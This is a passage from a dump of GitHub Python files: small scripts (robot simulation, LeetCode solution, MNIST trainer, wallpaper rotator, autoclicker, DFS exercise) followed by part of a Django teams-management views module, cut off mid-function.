key2 , eachitem in eachlist.items():\n depenRtotalfreq[key1] += eachitem\n print(key1, depenRtotalfreq[key1])\n\n","repo_name":"saqeeb360/Computational-Linguistics","sub_path":"Assignment2/Q1/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":6091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"74166080749","text":"import sys\nsys.path.insert(0, '../..')\n\nimport pyrosim\nimport math\n\nsim = pyrosim.Simulator(play_paused=True,debug=True,eval_time=5000)\n\n\n#for i in range(10):\n# segment = sim.send_cylinder(x=0,y=(-0.5-i),z=0.5, r=0,g=1,b=0,length=0.5,r1=0,r2=1,r3=0,radius=0.1,)\n\nsegment = [sim.send_cylinder(x=0,y=(0.5+i),z=0.5, r=((i+1)%2),g=(i%2),b=(i*3%2),length=.9,r1=0,r2=1,r3=0,radius=0.1) for i in range (10)]\n\njoint = [sim.send_hinge_joint(first_body_id=segment[i],second_body_id=segment[i+1],x=0,y=i+1,z=.5,n1=((i+1)%2),n2=0,n3=(i%2)) for i in range(9)]\n\nsensor = [sim.send_touch_sensor(body_id=segment[i]) for i in range(10)]\n\nsneuron = [sim.send_sensor_neuron(sensor[i]) for i in range(10)]\n\nmneuron = [sim.send_motor_neuron(joint[i]) for i in range(9)]\n\nsynapse = [sim.send_developing_synapse(sneuron[i],mneuron[i],start_weight=-10,end_weight=10,start_time=0, end_time=1) for i in range(9)]\n\nsim.start()\n","repo_name":"erichmatt/ludocrap","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"40627961216","text":"class Solution:\n def addDigits(self, num: int) -> int:\n if num==0: return 0\n x=[]\n while (num):\n x.append(num%10)\n num=num//10\n ans=x[0]\n if len(x)==1:\n return int(ans)\n p=sum(x)\n return self.addDigits(p)\n ","repo_name":"ShivGamer007/ShivCodeSxLeeTcode","sub_path":"0258-add-digits/0258-add-digits.py","file_name":"0258-add-digits.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10457036955","text":"'''Calculate the sum of two numbers.\nRepeat the code to check the sum for 5 sets of numbers.\nWrite Pseudocode, draw flow chart and python code using while loop.\n'''\ncounter=1\nwhile(counter<=5):\n print(\"Set \",counter)\n n1=int(input(\"Enter the first number: \"))\n n2 = int(input(\"Enter the second number: \"))\n sum=n1+n2\n 
print(\"Sum of \",n1,\" and \",n2,\" is: \",sum)\n    counter = counter + 1\n","repo_name":"murshi-dev/PythonCodes","sub_path":"PytthonBasics/Chapter11n12Activity/FindSum5Setnumbers.py","file_name":"FindSum5Setnumbers.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"3693395042","text":"import pyautogui as pag\nfrom time import sleep\n\ndef countdown():\n    timer = 3\n\n    while(timer != 0):\n        print(timer)\n        timer -= 1\n        sleep(1)\n\ndef mine():\n    pag.keyDown('o')\n    sleep(1)\n    pag.keyUp('o')\n    sleep(2)\n\ncountdown()\n\n\nwhile(True):\n    mine()","repo_name":"JSONCarrillo/Random-Python-Scripts","sub_path":"MC-Auto-Miner/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"42958563836","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 12 17:27:46 2018\n\n@author: Avinash Tiwari\n\"\"\"\n\nfrom keras.datasets import mnist\nimport matplotlib.pyplot as plt\n\n# Load dataset (download if needed)\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\nplt.subplot(221)\nplt.imshow(X_train[0], cmap=plt.get_cmap('gray'))\nplt.subplot(222)\nplt.imshow(X_train[1], cmap=plt.get_cmap('gray'))\nplt.subplot(223)\nplt.imshow(X_train[2], cmap=plt.get_cmap('gray'))\nplt.subplot(224)\nplt.imshow(X_train[3], cmap=plt.get_cmap('gray'))\n\nplt.show()\n\nimport numpy\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.utils import np_utils\nfrom keras import backend as K\n# the reshape below uses a channels-first layout of (1, 28, 28)\nK.set_image_data_format('channels_first')\n\n# fix the seed\nseed = 7\nnumpy.random.seed(seed)\n\nX_train = X_train.reshape(X_train.shape[0], 1, 28, 28).astype('float32')\nX_test = X_test.reshape(X_test.shape[0], 1, 28, 28).astype('float32')\n\nX_train = X_train / 255\nX_test = X_test / 255\n\n# one hot encoding\n# output - [ 0 0 0 0 0 1 0 0 0 0 ]\ny_train = np_utils.to_categorical(y_train)\ny_test = np_utils.to_categorical(y_test)\n\nnum_classes = y_train.shape[1]\n\ndef baseline_model():\n    model = Sequential()\n    model.add(Conv2D(8, (3,3), input_shape=(1,28,28), activation='relu'))\n    model.add(MaxPooling2D(pool_size=(2,2)))\n\n    model.add(Flatten())\n    model.add(Dense(4, activation='relu'))\n    model.add(Dense(num_classes, activation='softmax'))\n\n    model.compile(loss='categorical_crossentropy', optimizer='adam',\n                  metrics=['accuracy'])\n\n    return model\n\n# build a model\nmodel = baseline_model()\n\n# Fit\nmodel.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=3,\n          batch_size=32, verbose=2)\n\nmodel.save('model.h5')\n\n# Final eval\nscores = model.evaluate(X_test, y_test, verbose=0)\nprint(\"CNN error: %.2f%%\" % (100 - scores[1]*100))\n","repo_name":"AvinashTiwari/Artifical-intelligence","sub_path":"10_Docker_ml/Chap6-ML-Image/img-reco-train.py","file_name":"img-reco-train.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"}
+{"seq_id":"70046188911","text":"# Universal functions\n# A universal function (ufunc) performs element-wise operations on the data in an ndarray.\nimport numpy as np\nimport matplotlib.pyplot as plt\n\narr =
np.arange(10)\nprint(np.sqrt(arr))\nprint(np.exp(arr))\n\n# There are unary and binary universal functions.\n\n# Data processing with arrays\n# Replacing explicit loops with NumPy array expressions is commonly called vectorization; it is faster than pure Python operations.\n\npoints = np.arange(-5, 5, 0.01)\nxs, ys = np.meshgrid(points, points)\n\nz = np.sqrt(xs ** 2 + ys ** 2)\nprint(z)\n\nplt.imshow(z, cmap=plt.cm.gray);\nplt.colorbar()\n\nplt.title(\"graph\")\nplt.show()\n\n# Expressing conditional logic as array operations\nxarr = np.array([1.1, 1.2, 1.3, 1.4, 1.5])\nyarr = np.array([2.1, 2.2, 2.3, 2.4, 2.5])\ncond = np.array([True, False, True, True, False])\n\n# The following expression ...\nresult = [(x if c else y) for x, y, c in zip(xarr, yarr, cond)]\nprint(result)\n# ... and this expression are equivalent.\nresult2 = np.where(cond, xarr, yarr)\nprint(result2)\n","repo_name":"JisangYou/Python","sub_path":"Samples_2019/PfDA/np3.py","file_name":"np3.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"71889353069","text":"import re\nimport os\nimport json\nimport shlex\nimport random\nimport signal\nimport getpass\nimport threading\nimport subprocess\n\n\n################################################################################\n############################### Global variables ###############################\n################################################################################\n\n# System configurations\nROTATE_CMD = 'gsettings set org.gnome.desktop.background picture-uri file://%s'\nDEVNULL = open(os.devnull, 'wb')\n\n# Regex patterns\nREGEX_IMAGE = r'\\.(png|jpg|jpeg)$'\n\nwallpaper_path = None\nrotate_delay = None\nsleep_event = threading.Event()\nterminate = False\nimages = []\n\n\n################################################################################\n############################### Helper functions ###############################\n################################################################################\n\ndef interrupt_handler(sig_num, frame):\n    \"\"\"Handle system signal interrupts\"\"\"\n    global terminate\n    if sig_num != signal.SIGUSR1:\n        terminate = True\n    sleep_event.set()\n\n\ndef shell_escape(cmd):\n    \"\"\"Trivial shell escaping of a command\"\"\"\n    return \"'\" + cmd.replace(\"'\", \"'\\\\''\") + \"'\"\n\n\ndef load_images():\n    \"\"\"Reload images from source directory\"\"\"\n    global images, wallpaper_path\n    images = []\n    for img in os.listdir(wallpaper_path):\n        if re.search(REGEX_IMAGE, img, re.IGNORECASE):\n            images.append(os.path.join(wallpaper_path, img))\n\n\n################################################################################\n################################# Script start #################################\n################################################################################\n\nif __name__ == \"__main__\":\n    # Load the configuration file\n    configs = None\n    for path in [os.getcwd(), os.path.dirname(os.path.realpath(__file__))]:\n        config_path = os.path.join(path, 'wallchd.json')\n        if os.path.exists(config_path):\n            with open(config_path) as conf_file:\n                configs = json.loads(conf_file.read())\n            break\n    wallpaper_path = configs['wallpaper_path']\n    rotate_delay = configs['rotate_delay']\n\n    # Handle signals\n    signal.signal(signal.SIGINT, interrupt_handler)\n    signal.signal(signal.SIGTERM, interrupt_handler)\n    signal.signal(signal.SIGUSR1, interrupt_handler)\n\n    # Main event loop\n    cycle_err = False\n    while not terminate:\n        if cycle_err:\n            sleep_event.wait(5)\n            sleep_event.clear()\n        cycle_err = True\n\n        # TODO(jtsai): Only reload images if the directory has been changed.\n        try:
load_images()\n except OSError:\n continue\n\n # HACK(jtsai): We need to get the DBUS_SESSION_BUS_ADDRESS in order for\n # Gnome settings command to properly work. For this hack, we pull the\n # D-Bus session from the environments of the actively running\n # gnome-session under the current user that wallchd is running under.\n SESSION_REGEX = r'/(gnome|cinnamon)-session(\\s+|$)'\n DBUS_REGEX = r'^DBUS_SESSION_BUS_ADDRESS=(.*)'\n dbus_addr = None\n for pid in [x for x in os.listdir('/proc') if x.isdigit()]:\n try:\n exe = os.path.realpath('/proc/%s/exe' % pid)\n except OSError:\n continue\n if re.search(SESSION_REGEX, exe):\n with open('/proc/%s/environ' % pid) as envs:\n for env in envs.read().split('\\0'):\n res = re.search(DBUS_REGEX, env)\n if res:\n dbus_addr = res.groups()[0]\n if dbus_addr is None:\n continue\n os.environ['DBUS_SESSION_BUS_ADDRESS'] = dbus_addr\n os.environ['DISPLAY'] = ':0'\n\n # Change the background image\n image_path = shell_escape(random.choice(images))\n cmd_str = ROTATE_CMD % image_path\n cmd = shlex.split(cmd_str)\n subprocess.Popen(cmd, stdout = DEVNULL, stderr = DEVNULL).wait()\n\n # Sleep rotation delay\n sleep_event.wait(rotate_delay)\n sleep_event.clear()\n cycle_err = False\n","repo_name":"dsnet/wallchd","sub_path":"wallchd.py","file_name":"wallchd.py","file_ext":"py","file_size_in_byte":4201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10456587819","text":"import sys\n\nsys.stdin = open('input.txt', 'r')\n\ndef DFS(S):\n if S > T :\n return\n if S == T :\n res.add(tuple(check))\n else :\n for i in range(K) :\n if check[i] < PN[i][1] :\n check[i] += 1\n DFS(S+PN[i][0])\n check[i] -= 1\n\nif __name__ == '__main__':\n T = int(input())\n K = int(input())\n PN = list()\n for _ in range(K) :\n p, n = map(int, input().split())\n PN.append((p,n))\n check = [0]*K\n res = set()\n DFS(0)\n print(len(res))","repo_name":"tlgus626/CodingTest","sub_path":"ch6/q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15753520458","text":"import logging\nimport random\n\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.contrib.sites.models import Site\nfrom django.core.urlresolvers import reverse\nfrom django.db.models import Q, Count\nfrom django.http import Http404, HttpResponseForbidden, HttpResponseRedirect, HttpResponse, HttpResponseBadRequest\nfrom django.shortcuts import get_object_or_404, redirect, render_to_response\nfrom django.template import RequestContext\nfrom django.utils import simplejson as json\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.views.generic.list_detail import object_list\n\nimport teams.moderation_const as MODERATION\nimport widget\nfrom apps.auth.models import UserLanguage, CustomUser as User\nfrom apps.videos.templatetags.paginator import paginate\nfrom messages import tasks as notifier\nfrom teams.forms import (\n CreateTeamForm, AddTeamVideoForm, EditTeamVideoForm,\n AddTeamVideosFromFeedForm, TaskAssignForm, SettingsForm, TaskCreateForm,\n PermissionsForm, WorkflowForm, InviteForm, TaskDeleteForm,\n GuidelinesMessagesForm, RenameableSettingsForm, ProjectForm, LanguagesForm,\n UnpublishForm, MoveTeamVideoForm, UploadDraftForm\n)\nfrom 
teams.models import (\n Team, TeamMember, Invite, Application, TeamVideo, Task, Project, Workflow,\n Setting, TeamLanguagePreference, autocreate_tasks\n)\nfrom teams.permissions import (\n can_add_video, can_assign_role, can_assign_tasks, can_create_task_subtitle,\n can_create_task_translate, can_view_tasks_tab, can_invite,\n roles_user_can_assign, can_join_team, can_edit_video, can_delete_tasks,\n can_perform_task, can_rename_team, can_change_team_settings,\n can_perform_task_for, can_delete_team, can_review, can_approve,\n can_delete_video, can_remove_video\n)\nfrom teams.search_indexes import TeamVideoLanguagesIndex\nfrom teams.signals import api_teamvideo_new, api_subtitles_rejected\nfrom teams.tasks import (\n invalidate_video_caches, invalidate_video_moderation_caches,\n update_video_moderation, update_one_team_video\n)\nfrom utils import render_to, render_to_json, DEFAULT_PROTOCOL\nfrom utils.forms import flatten_errorlists\nfrom utils.panslugify import pan_slugify\nfrom utils.searching import get_terms\nfrom utils.translation import get_language_choices, languages_with_labels\nfrom videos import metadata_manager\nfrom videos.tasks import (\n upload_subtitles_to_original_service, delete_captions_in_original_service,\n delete_captions_in_original_service_by_code\n)\nfrom videos.models import Action, VideoUrl, SubtitleLanguage, SubtitleVersion\nfrom widget.rpc import add_general_settings\nfrom widget.views import base_widget_params\n\n\nimport sentry_logger # Magical import to make Sentry's error recording happen.\nassert sentry_logger # It's okay, Pyflakes. Trust me.\nlogger = logging.getLogger(\"teams.views\")\n\n\nTASKS_ON_PAGE = getattr(settings, 'TASKS_ON_PAGE', 20)\nTEAMS_ON_PAGE = getattr(settings, 'TEAMS_ON_PAGE', 10)\nMAX_MEMBER_SEARCH_RESULTS = 40\nHIGHTLIGHTED_TEAMS_ON_PAGE = getattr(settings, 'HIGHTLIGHTED_TEAMS_ON_PAGE', 10)\nCUTTOFF_DUPLICATES_NUM_VIDEOS_ON_TEAMS = getattr(settings, 'CUTTOFF_DUPLICATES_NUM_VIDEOS_ON_TEAMS', 20)\n\nVIDEOS_ON_PAGE = getattr(settings, 'VIDEOS_ON_PAGE', 16)\nMEMBERS_ON_PAGE = getattr(settings, 'MEMBERS_ON_PAGE', 15)\nAPLICATIONS_ON_PAGE = getattr(settings, 'APLICATIONS_ON_PAGE', 15)\nACTIONS_ON_PAGE = getattr(settings, 'ACTIONS_ON_PAGE', 20)\nDEV = getattr(settings, 'DEV', False)\nDEV_OR_STAGING = DEV or getattr(settings, 'STAGING', False)\n\n\ndef index(request, my_teams=False):\n q = request.REQUEST.get('q')\n\n if my_teams and request.user.is_authenticated():\n ordering = 'name'\n qs = Team.objects.filter(members__user=request.user)\n else:\n ordering = request.GET.get('o', 'members')\n qs = Team.objects.for_user(request.user).annotate(_member_count=Count('users__pk'))\n\n if q:\n qs = qs.filter(Q(name__icontains=q)|Q(description__icontains=q))\n\n order_fields = {\n 'name': 'name',\n 'date': 'created',\n 'members': '_member_count'\n }\n order_fields_name = {\n 'name': _(u'Name'),\n 'date': _(u'Newest'),\n 'members': _(u'Most Members')\n }\n order_fields_type = {\n 'name': 'asc',\n 'date': 'desc',\n 'members': 'desc'\n }\n order_type = request.GET.get('ot', order_fields_type.get(ordering, 'desc'))\n\n if ordering in order_fields and order_type in ['asc', 'desc']:\n qs = qs.order_by(('-' if order_type == 'desc' else '')+order_fields[ordering])\n\n highlighted_ids = list(Team.objects.for_user(request.user).filter(highlight=True).values_list('id', flat=True))\n random.shuffle(highlighted_ids)\n highlighted_qs = Team.objects.filter(pk__in=highlighted_ids[:HIGHTLIGHTED_TEAMS_ON_PAGE]) \\\n .annotate(_member_count=Count('users__pk'))\n\n 
extra_context = {\n 'my_teams': my_teams,\n 'query': q,\n 'ordering': ordering,\n 'order_type': order_type,\n 'order_name': order_fields_name.get(ordering, 'name'),\n 'highlighted_qs': highlighted_qs,\n }\n return object_list(request, queryset=qs,\n paginate_by=TEAMS_ON_PAGE,\n template_name='teams/teams-list.html',\n template_object_name='teams',\n extra_context=extra_context)\n\n@render_to('teams/videos-list.html')\ndef detail(request, slug, project_slug=None, languages=None):\n team = Team.get(slug, request.user)\n filtered = 0\n\n if project_slug is not None:\n project = get_object_or_404(Project, team=team, slug=project_slug)\n else:\n project = None\n\n query = request.GET.get('q')\n sort = request.GET.get('sort')\n language = request.GET.get('lang')\n\n if language:\n filtered = filtered + 1\n\n if language != 'none':\n qs = team.get_videos_for_languages_haystack(\n language, user=request.user, project=project, query=query, sort=sort)\n else:\n qs = team.get_videos_for_languages_haystack(\n num_completed_langs=0, user=request.user, project=project, query=query, sort=sort)\n\n extra_context = widget.add_onsite_js_files({})\n\n extra_context['all_videos_count'] = team.get_videos_for_languages_haystack(\n None, user=request.user, project=None, query=None, sort=sort).count()\n\n extra_context.update({\n 'team': team,\n 'project':project,\n 'can_add_video': can_add_video(team, request.user, project),\n 'can_edit_videos': can_add_video(team, request.user, project),\n 'filtered': filtered\n })\n\n if extra_context['can_add_video'] or extra_context['can_edit_videos']:\n # Cheat and reduce the number of videos on the page if we're dealing with\n # someone who can edit videos in the team, for performance reasons.\n is_editor = True\n per_page = 8\n else:\n is_editor = False\n per_page = VIDEOS_ON_PAGE\n\n general_settings = {}\n add_general_settings(request, general_settings)\n extra_context['general_settings'] = json.dumps(general_settings)\n\n if team.video:\n extra_context['widget_params'] = base_widget_params(request, {\n 'video_url': team.video.get_video_url(),\n 'base_state': {}\n })\n\n readable_langs = TeamLanguagePreference.objects.get_readable(team)\n language_choices = [(code, name) for code, name in get_language_choices()\n if code in readable_langs]\n\n extra_context['language_choices'] = language_choices\n extra_context['query'] = query\n\n sort_names = {\n 'name': 'Name, A-Z',\n '-name': 'Name, Z-A',\n 'time': 'Time, Oldest',\n '-time': 'Time, Newest',\n 'subs': 'Subtitles, Least',\n '-subs': 'Subtitles, Most',\n }\n if sort:\n extra_context['order_name'] = sort_names[sort]\n else:\n extra_context['order_name'] = sort_names['-time']\n\n extra_context['current_videos_count'] = qs.count()\n extra_context['filtered'] = filtered\n\n team_video_md_list, pagination_info = paginate(qs, per_page, request.GET.get('page'))\n extra_context.update(pagination_info)\n extra_context['team_video_md_list'] = team_video_md_list\n extra_context['team_workflows'] = list(\n Workflow.objects.filter(team=team.id)\n .select_related('project', 'team', 'team_video'))\n\n if is_editor:\n team_video_ids = [record.team_video_pk for record in team_video_md_list]\n team_videos = list(TeamVideo.objects.filter(id__in=team_video_ids).select_related('video', 'team', 'project'))\n team_videos = dict((tv.pk, tv) for tv in team_videos)\n for record in team_video_md_list:\n if record:\n record._team_video = team_videos.get(record.team_video_pk)\n if record._team_video:\n record._team_video.original_language_code = 
record.original_language\n record._team_video.completed_langs = record.video_completed_langs\n\n return extra_context\n\ndef role_saved(request, slug):\n messages.success(request, _(u'Member saved.'))\n return_path = reverse('teams:detail_members', args=[], kwargs={'slug': slug})\n return HttpResponseRedirect(return_path)\n\ndef completed_videos(request, slug):\n team = Team.get(slug, request.user)\n if team.is_member(request.user):\n qs = TeamVideoLanguagesIndex.results_for_members(team)\n else:\n qs = TeamVideoLanguagesIndex.results()\n qs = qs.filter(team_id=team.id).filter(is_complete=True).order_by('-video_complete_date')\n\n extra_context = widget.add_onsite_js_files({})\n extra_context.update({\n 'team': team\n })\n\n if team.video:\n extra_context['widget_params'] = base_widget_params(request, {\n 'video_url': team.video.get_video_url(),\n 'base_state': {}\n })\n\n return object_list(request, queryset=qs,\n paginate_by=VIDEOS_ON_PAGE,\n template_name='teams/completed_videos.html',\n extra_context=extra_context,\n template_object_name='team_video')\n\ndef videos_actions(request, slug):\n team = Team.get(slug, request.user)\n\n try:\n user = request.user if request.user.is_authenticated() else None\n member = team.members.get(user=user) if user else None\n except TeamMember.DoesNotExist:\n member = False\n\n public_only = False if member else True\n qs = Action.objects.for_team(team, public_only=public_only)\n\n extra_context = {\n 'team': team\n }\n return object_list(request, queryset=qs,\n paginate_by=ACTIONS_ON_PAGE,\n template_name='teams/videos_actions.html',\n extra_context=extra_context,\n template_object_name='videos_action')\n\n@render_to('teams/create.html')\n@staff_member_required\ndef create(request):\n user = request.user\n\n if not DEV and not (user.is_superuser and user.is_active):\n raise Http404\n\n if request.method == 'POST':\n form = CreateTeamForm(request.user, request.POST, request.FILES)\n if form.is_valid():\n team = form.save(user)\n messages.success(request, _(\"\"\"\n Your team has been created. 
Here are some next steps:\n \n \"\"\" % dict(\n edit=reverse(\"teams:settings_permissions\", kwargs={\"slug\": team.slug}),\n activate=reverse(\"teams:settings_permissions\", kwargs={\"slug\": team.slug}),\n create=reverse(\"teams:settings_projects\", kwargs={\"slug\": team.slug}),\n lang=reverse(\"teams:settings_languages\", kwargs={\"slug\": team.slug}),\n custom=reverse(\"teams:settings_guidelines\", kwargs={\"slug\": team.slug}),\n )))\n return redirect(reverse(\"teams:settings_basic\", kwargs={\"slug\":team.slug}))\n else:\n form = CreateTeamForm(request.user)\n\n return { 'form': form }\n\n\n# Settings\ndef _delete_team(request, team):\n if not can_delete_team(team, request.user):\n messages.error(request, _(u'You do not have permission to delete this team.'))\n return None\n\n team.deleted = True\n team.save()\n\n return HttpResponseRedirect(reverse('teams:index'))\n\n@render_to('teams/settings.html')\n@login_required\ndef settings_basic(request, slug):\n team = Team.get(slug, request.user)\n\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n if request.POST.get('delete'):\n r = _delete_team(request, team)\n if r:\n return r\n\n if can_rename_team(team, request.user):\n FormClass = RenameableSettingsForm\n else:\n FormClass = SettingsForm\n\n if request.POST:\n form = FormClass(request.POST, request.FILES, instance=team)\n\n if form.is_valid():\n try:\n form.save()\n except:\n logger.exception(\"Error on changing team settings\")\n raise\n\n messages.success(request, _(u'Settings saved.'))\n return HttpResponseRedirect(request.path)\n else:\n form = FormClass(instance=team)\n\n return { 'team': team, 'form': form, }\n\n@render_to('teams/settings-guidelines.html')\n@login_required\ndef settings_guidelines(request, slug):\n team = Team.get(slug, request.user)\n\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n initial = dict((s.key_name, s.data) for s in team.settings.messages_guidelines())\n if request.POST:\n form = GuidelinesMessagesForm(request.POST, initial=initial)\n\n if form.is_valid():\n for key, val in form.cleaned_data.items():\n setting, c = Setting.objects.get_or_create(team=team, key=Setting.KEY_IDS[key])\n setting.data = val\n setting.save()\n\n messages.success(request, _(u'Guidelines and messages updated.'))\n return HttpResponseRedirect(request.path)\n else:\n form = GuidelinesMessagesForm(initial=initial)\n\n return { 'team': team, 'form': form, }\n\n@render_to('teams/settings-permissions.html')\n@login_required\ndef settings_permissions(request, slug):\n team = Team.get(slug, request.user)\n workflow = Workflow.get_for_target(team.id, 'team')\n moderated = team.moderates_videos()\n\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n if request.POST:\n form = PermissionsForm(request.POST, instance=team)\n workflow_form = WorkflowForm(request.POST, instance=workflow)\n\n if form.is_valid() and workflow_form.is_valid():\n form.save()\n\n if form.cleaned_data['workflow_enabled']:\n workflow_form.save()\n\n moderation_changed = moderated != form.instance.moderates_videos()\n if moderation_changed:\n update_video_moderation.delay(team)\n 
invalidate_video_moderation_caches.delay(team)\n\n messages.success(request, _(u'Settings saved.'))\n return HttpResponseRedirect(request.path)\n else:\n form = PermissionsForm(instance=team)\n workflow_form = WorkflowForm(instance=workflow)\n\n return { 'team': team, 'form': form, 'workflow_form': workflow_form, }\n\n@render_to('teams/settings-projects.html')\n@login_required\ndef settings_projects(request, slug):\n team = Team.get(slug, request.user)\n projects = team.project_set.exclude(name=Project.DEFAULT_NAME)\n\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n return { 'team': team, 'projects': projects, }\n\ndef _set_languages(team, codes_preferred, codes_blacklisted):\n tlps = TeamLanguagePreference.objects.for_team(team)\n\n existing = set(tlp.language_code for tlp in tlps)\n\n desired_preferred = set(codes_preferred)\n desired_blacklisted = set(codes_blacklisted)\n desired = desired_preferred | desired_blacklisted\n\n # Figure out which languages need to be deleted/created/changed.\n to_delete = existing - desired\n\n to_create_preferred = desired_preferred - existing\n to_set_preferred = desired_preferred & existing\n\n to_create_blacklisted = desired_blacklisted - existing\n to_set_blacklisted = desired_blacklisted & existing\n\n # Delete unneeded prefs.\n for tlp in tlps.filter(language_code__in=to_delete):\n tlp.delete()\n\n # Change existing prefs.\n for tlp in tlps.filter(language_code__in=to_set_preferred):\n tlp.preferred, tlp.allow_reads, tlp.allow_writes = True, False, False\n tlp.save()\n\n for tlp in tlps.filter(language_code__in=to_set_blacklisted):\n tlp.preferred, tlp.allow_reads, tlp.allow_writes = False, False, False\n tlp.save()\n\n # Create remaining prefs.\n for lang in to_create_preferred:\n tlp = TeamLanguagePreference(team=team, language_code=lang,\n allow_reads=False, allow_writes=False,\n preferred=True)\n tlp.save()\n\n for lang in to_create_blacklisted:\n tlp = TeamLanguagePreference(team=team, language_code=lang,\n allow_reads=False, allow_writes=False,\n preferred=False)\n tlp.save()\n\n@render_to('teams/settings-languages.html')\n@login_required\ndef settings_languages(request, slug):\n team = Team.get(slug, request.user)\n\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n preferred = [tlp.language_code for tlp in\n TeamLanguagePreference.objects.for_team(team).filter(preferred=True)]\n blacklisted = [tlp.language_code for tlp in\n TeamLanguagePreference.objects.for_team(team).filter(preferred=False)]\n initial = {'preferred': preferred, 'blacklisted': blacklisted}\n\n if request.POST:\n form = LanguagesForm(team, request.POST, initial=initial)\n\n if form.is_valid():\n _set_languages(team, form.cleaned_data['preferred'], form.cleaned_data['blacklisted'])\n\n messages.success(request, _(u'Settings saved.'))\n invalidate_video_caches.delay(team.pk)\n return HttpResponseRedirect(request.path)\n else:\n form = LanguagesForm(team, initial=initial)\n\n return { 'team': team, 'form': form }\n\n\n# Videos\n@render_to('teams/add_video.html')\n@login_required\ndef add_video(request, slug):\n team = Team.get(slug, request.user)\n\n project_id = request.GET.get('project') or request.POST.get('project') or None\n project = Project.objects.get(team=team, pk=project_id) if 
project_id else team.default_project\n\n if request.POST and not can_add_video(team, request.user, project):\n messages.error(request, _(u\"You can't add that video to this team/project.\"))\n return HttpResponseRedirect(team.get_absolute_url())\n\n initial = {\n 'video_url': request.GET.get('url', ''),\n 'title': request.GET.get('title', '')\n }\n\n if project:\n initial['project'] = project\n\n form = AddTeamVideoForm(team, request.user, request.POST or None, request.FILES or None, initial=initial)\n\n if form.is_valid():\n obj = form.save(False)\n obj.added_by = request.user\n obj.save()\n api_teamvideo_new.send(obj)\n messages.success(request, form.success_message())\n return redirect(team.get_absolute_url())\n\n return {\n 'form': form,\n 'team': team\n }\n\n@login_required\ndef move_video(request):\n form = MoveTeamVideoForm(request.user, request.POST)\n\n if form.is_valid():\n team_video = form.cleaned_data['team_video']\n team = form.cleaned_data['team']\n project = form.cleaned_data['project']\n team_video.move_to(team, project)\n messages.success(request, _(u'The video has been moved to the new team.'))\n else:\n for e in flatten_errorlists(form.errors):\n messages.error(request, e)\n\n return HttpResponseRedirect(request.POST.get('next', '/'))\n\n@render_to('teams/add_videos.html')\n@login_required\ndef add_videos(request, slug):\n team = Team.get(slug, request.user)\n\n if not can_add_video(team, request.user):\n messages.error(request, _(u\"You can't add videos to this team/project.\"))\n return HttpResponseRedirect(team.get_absolute_url())\n\n form = AddTeamVideosFromFeedForm(team, request.user, request.POST or None)\n\n if form.is_valid():\n team_videos = form.save()\n [api_teamvideo_new.send(tv) for tv in team_videos]\n messages.success(request, form.success_message() % {'count': len(team_videos)})\n return redirect(team)\n\n return { 'form': form, 'team': team, }\n\n@login_required\n@render_to('teams/team_video.html')\ndef team_video(request, team_video_pk):\n team_video = get_object_or_404(TeamVideo, pk=team_video_pk)\n\n if not can_edit_video(team_video, request.user):\n messages.error(request, _(u'You can\\'t edit this video.'))\n return HttpResponseRedirect(team_video.team.get_absolute_url())\n\n meta = team_video.video.metadata()\n form = EditTeamVideoForm(request.POST or None, request.FILES or None,\n instance=team_video, user=request.user, initial=meta)\n\n if form.is_valid():\n form.save()\n messages.success(request, _('Video has been updated.'))\n return redirect(team_video)\n\n context = widget.add_onsite_js_files({})\n\n context.update({\n 'team': team_video.team,\n 'team_video': team_video,\n 'form': form,\n 'user': request.user,\n 'widget_params': base_widget_params(request, {'video_url': team_video.video.get_video_url(), 'base_state': {}})\n })\n return context\n\n@render_to_json\n@login_required\ndef remove_video(request, team_video_pk):\n def _error_resp(request, next, error):\n if request.is_ajax():\n return { 'success': False, 'error': error }\n else:\n messages.error(request, error)\n return HttpResponseRedirect(next)\n\n team_video = get_object_or_404(TeamVideo, pk=team_video_pk)\n\n if request.method != 'POST':\n return _error_resp(request, reverse('teams:user_teams'),\n _(u'Request must be a POST request.'))\n\n next = request.POST.get('next', 